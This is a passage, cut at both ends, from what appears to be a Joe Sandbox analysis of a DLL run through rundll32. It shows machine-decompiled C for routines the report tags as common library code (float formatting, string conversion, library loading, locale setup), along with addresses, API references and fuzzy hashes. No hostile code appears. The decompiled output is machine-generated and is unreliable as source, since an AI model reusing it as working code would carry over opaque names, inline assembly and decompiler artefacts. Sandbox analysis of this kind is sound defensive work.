						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6E2675C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6E2675C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6E2239C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6E2675C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6E267640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6E267640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6E267640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6E24F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6E2678B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6E242281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6E24215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x6e24f345
0x6e24f350
0x6e24f357
0x6e24f359
0x6e24f359
0x6e24f35b
0x6e24f364
0x6e24f366
0x6e24f36b
0x6e24f371
0x6e24f387
0x6e24f38c
0x6e24f38f
0x6e24f39c
0x6e24f3a1
0x6e24f3f5
0x6e24f3fd
0x6e24f3ff
0x6e24f401
0x6e24f404
0x6e24f404
0x6e24f404
0x6e24f40a
0x6e24f412
0x6e24f425
0x6e24f428
0x6e24f42a
0x6e24f42d
0x6e24f42e
0x6e24f44f
0x6e24f452
0x6e24f452
0x6e24f430
0x6e24f430
0x6e24f432
0x6e24f43d
0x6e24f43d
0x6e24f43f
0x6e24f446
0x6e24f441
0x6e24f441
0x6e24f441
0x6e24f43f
0x6e24f453
0x6e24f455
0x6e24f456
0x6e24f459
0x6e24f45b
0x6e24f465
0x6e24f46f
0x6e24f45d
0x6e24f45d
0x6e24f45d
0x6e24f474
0x6e24f474
0x6e24f479
0x6e24f47c
0x6e24f487
0x6e24f487
0x6e24f487
0x6e24f487
0x6e24f48b
0x6e24f492
0x6e24f493
0x6e24f496
0x6e24f499
0x6e24f499
0x6e24f49b
0x00000000
0x00000000
0x6e24f4b3
0x6e24f4ba
0x6e24f4be
0x6e24f4c1
0x6e24f4c4
0x6e24f4c6
0x6e24f4c6
0x6e24f4c6
0x6e24f4c8
0x6e24f4cb
0x6e24f4ce
0x6e24f4d0
0x6e24f4d8
0x6e24f4de
0x6e24f4e1
0x6e24f4e4
0x6e24f4e5
0x6e24f4e8
0x6e24f4eb
0x6e24f4eb
0x6e24f4f0
0x6e24f4f3
0x00000000
0x00000000
0x6e24f50b
0x6e24f510
0x6e24f514
0x00000000
0x00000000
0x6e24f518
0x6e24f51b
0x6e24f51c
0x6e24f51c
0x6e24f51e
0x6e24f521
0x00000000
0x00000000
0x6e24f523
0x6e24f526
0x6e24f52d
0x6e24f530
0x6e24f533
0x6e24f549
0x6e24f549
0x6e24f549
0x6e24f535
0x6e24f535
0x6e24f537
0x6e24f53a
0x6e24f545
0x6e24f53c
0x6e24f53f
0x6e24f53f
0x6e24f53a
0x00000000
0x6e24f533
0x6e24f528
0x6e24f528
0x6e24f52a
0x6e24f52a
0x6e24f47e
0x6e24f47e
0x6e24f481
0x6e24f54c
0x6e24f54c
0x6e24f54e
0x6e24f550
0x6e24f553
0x6e24f554
0x6e24f555
0x6e24f556
0x6e24f55e
0x6e24f55e
0x6e24f55e
0x6e24f560
0x6e24f563
0x6e24f566
0x6e24f568
0x6e24f568
0x6e24f56a
0x6e24f57c
0x6e24f580
0x6e24f583
0x6e24f58a
0x6e24f592
0x6e24f592
0x6e24f595
0x6e24f597
0x6e24f5a8
0x6e24f5a8
0x6e24f5ac
0x6e24f5ac
0x6e24f5af
0x6e24f5b1
0x6e24f5b4
0x00000000
0x6e24f599
0x6e24f599
0x6e24f59f
0x6e24f59f
0x6e24f5a3
0x6e24f5b6
0x6e24f5b6
0x6e24f5ba
0x6e24f5bb
0x6e24f5bd
0x6e24f5bf
0x6e24f600
0x6e24f600
0x6e24f602
0x6e24f60f
0x6e24f60f
0x6e24f611
0x6e24f613
0x6e24f614
0x6e24f615
0x6e24f61c
0x6e24f61f
0x6e24f621
0x6e24f621
0x6e24f622
0x6e24f624
0x6e24f627
0x6e24f627
0x6e24f629
0x6e24f62b
0x00000000
0x6e24f62b
0x6e24f604
0x6e24f606
0x00000000
0x00000000
0x6e24f608
0x00000000
0x00000000
0x6e24f60a
0x6e24f60d
0x00000000
0x00000000
0x00000000
0x6e24f60d
0x6e24f5c6
0x6e24f5cc
0x6e24f5cc
0x6e24f5ce
0x6e24f5cf
0x6e24f5d0
0x6e24f5d1
0x6e24f5d8
0x6e24f5db
0x6e24f5dd
0x6e24f5de
0x6e24f5e0
0x6e24f5ed
0x6e24f5ed
0x6e24f5ef
0x6e24f5f1
0x6e24f5f2
0x6e24f5f3
0x6e24f5fa
0x6e24f5fd
0x6e24f5ff
0x6e24f5ff
0x00000000
0x6e24f5ff
0x6e24f5e2
0x6e24f5e2
0x6e24f5e4
0x00000000
0x00000000
0x6e24f5e6
0x00000000
0x00000000
0x6e24f5e8
0x6e24f5eb
0x00000000
0x00000000
0x00000000
0x6e24f5eb
0x6e24f5c8
0x6e24f5ca
0x00000000
0x00000000
0x00000000
0x6e24f5ca
0x6e24f59b
0x6e24f59d
0x00000000
0x00000000
0x00000000
0x6e24f59d
0x6e24f597
0x00000000
0x6e24f481
0x6e24f47c
0x6e24f3a3
0x6e24f3a5
0x00000000
0x6e24f3a7
0x6e24f3bd
0x6e24f3c2
0x6e24f3c4
0x6e24f3d0
0x6e24f3d6
0x6e24f3d7
0x6e24f3d9
0x6e24f3db
0x6e24f3e6
0x6e24f3e6
0x6e24f3e9
0x6e24f3eb
0x6e24f3eb
0x6e24f3ee
0x6e24f3c6
0x6e24f3c6
0x6e24f3c6
0x00000000
0x6e24f3c4
0x6e24f373
0x6e24f373
0x6e24f37a
0x6e24f37b
0x6e24f37d
0x6e24f62f
0x6e24f633
0x6e24f638
0x6e24f638
0x6e24f647
0x6e24f647

APIs

_strrchr.LIBCMT ref: 6E24F3D0
__alldvrm.LIBCMT ref: 6E24F5D1
__alldvrm.LIBCMT ref: 6E24F5F3

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: 07e65a92fcb1d6d644c436182b844975bdb8764f7259a11deebbd27491fcd912
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: 3EA1557691428FDFF719CFA8C890BABBBE6EF85314F2442ADD5949B280C7348941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E256102, Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E6E256102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t34 ^ _t69;
				E6E231F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6E21F8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6E2239C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6E20DEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6E24F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6E2201B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}

0x6e256102
0x6e25610a
0x6e256111
0x6e25611d
0x6e256122
0x6e256127
0x6e25612c
0x6e25612c
0x6e25612f
0x6e256131
0x6e256131
0x6e256136
0x6e25614f
0x6e256155
0x6e25615a
0x6e2561f9
0x6e2561fd
0x6e256202
0x6e256202
0x6e25621e
0x6e25621e
0x6e256160
0x6e256163
0x6e256168
0x6e25616c
0x6e2561b8
0x6e2561ba
0x6e2561bc
0x6e2561c1
0x6e2561d8
0x6e2561e0
0x6e2561f0
0x6e2561f0
0x6e2561e0
0x6e2561f2
0x6e2561f3
0x00000000
0x6e2561f8
0x6e25616e
0x6e256173
0x6e256175
0x6e256177
0x6e256177
0x6e25617f
0x6e25619c
0x6e2561a6
0x6e2561ab
0x00000000
0x00000000
0x6e2561ad
0x6e2561b3
0x6e2561b3
0x00000000
0x6e2561b3
0x6e256183
0x6e256187
0x6e25618c
0x6e256190
0x00000000
0x00000000
0x6e256192
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E270EA8,00000000,00000000,008B018B,6E24DA1E,?,00000004,00000001,6E270EA8,0000007F,?,008B018B,00000001), ref: 6E25614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2561D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2561EA
__freea.LIBCMT ref: 6E2561F3

Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7fb46c4d03f15009eff6bcf12666da4053785c49decca322f54573e66cd471df
Instruction ID: 24040bab084808e666568400936d7155eeaf8ac9e81db9348fa2041b39c9d7f1
Opcode Fuzzy Hash: 7fb46c4d03f15009eff6bcf12666da4053785c49decca322f54573e66cd471df
Instruction Fuzzy Hash: 6B31BF71A1021F9FDF148FA4CC84DBE7BA6EB40614F188568EC14DA351EB35C960CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E253E7F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E6E253E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6e2c7908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6e271690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x2b33ced4
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x6e253e84
0x6e253e88
0x6e253e8f
0x6e253e93
0x6e253ea1
0x6e253eb7
0x6e253ebb
0x6e253ee4
0x6e253ee6
0x6e253eea
0x6e253eed
0x6e253eed
0x6e253ef3
0x6e253ef5
0x00000000
0x6e253ef6
0x6e253ebd
0x6e253ec6
0x6e253ed5
0x6e253ec8
0x6e253ecb
0x6e253ed1
0x6e253ed1
0x6e253ed9
0x00000000
0x6e253edb
0x6e253ede
0x6e253ee0
0x00000000
0x6e253ee0
0x6e253ed9
0x6e253e95
0x6e253e9a
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue), ref: 6E253EB1
GetLastError.KERNEL32(?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000,00000364,?,6E24D6D1), ref: 6E253EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000), ref: 6E253ECB

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
Instruction ID: b608b0b885ca7fd519d03412d6d71d138d0ca4d3c501e79feaf1a421cc3c9c77
Opcode Fuzzy Hash: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
Instruction Fuzzy Hash: C601FC3236563B9BCB514BA98D4CD5777EBBF167A1B240624F905D3344DB21D821C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2114EC, Relevance: 6.0, APIs: 4, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E6E2114EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E210110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}

0x6e2114f3
0x6e2114f8
0x6e2114fb
0x6e2114fd
0x6e2114ff
0x6e211504
0x6e211506
0x6e211508
0x6e21150a
0x6e21150c
0x6e211512
0x6e211515
0x6e21151a
0x6e211524
0x6e211528
0x6e211530
0x6e211531
0x6e211532
0x6e211533
0x6e211536
0x6e21153e
0x6e21153e
0x6e211540
0x6e211545
0x6e21154a
0x6e21154a
0x6e211545
0x6e211508
0x6e211551
0x6e211557

APIs

__EH_prolog3.LIBCMT ref: 6E2114F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211528

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

numpunct.LIBCPMT ref: 6E211539

Part of subcall function 6E210110: __EH_prolog3.LIBCMT ref: 6E210117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21154A

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
Instruction ID: 2e32ef2f549774a53d890ce118931582242e0feea91c09fbe127c2a04df80d54
Opcode Fuzzy Hash: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
Instruction Fuzzy Hash: 8701D674A0021F9FD701CBE8C851BDE7BBAAF10744F100416E615BB240EB704B85C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E211558, Relevance: 6.0, APIs: 4, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E6E211558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E210143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}

0x6e21155f
0x6e211564
0x6e211567
0x6e211569
0x6e21156b
0x6e211570
0x6e211572
0x6e211574
0x6e211576
0x6e211578
0x6e21157e
0x6e211581
0x6e211586
0x6e211590
0x6e211594
0x6e21159c
0x6e21159d
0x6e21159e
0x6e21159f
0x6e2115a2
0x6e2115aa
0x6e2115aa
0x6e2115ac
0x6e2115b1
0x6e2115b6
0x6e2115b6
0x6e2115b1
0x6e211574
0x6e2115bd
0x6e2115c3

APIs

__EH_prolog3.LIBCMT ref: 6E21155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211594

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

numpunct.LIBCPMT ref: 6E2115A5

Part of subcall function 6E210143: __EH_prolog3.LIBCMT ref: 6E21014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E2115B6

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
Instruction ID: 8e155efdcd922922af3e2e2a8304fb80cc0c8c159035ca2b258a3c26daefa17d
Opcode Fuzzy Hash: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
Instruction Fuzzy Hash: C501D1B4A0421FAFDB20CBE4C860BDEBBBAAF14744F100515EA15AB280CBB04B85C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E21C229, Relevance: 6.0, APIs: 4, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E6E21C229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
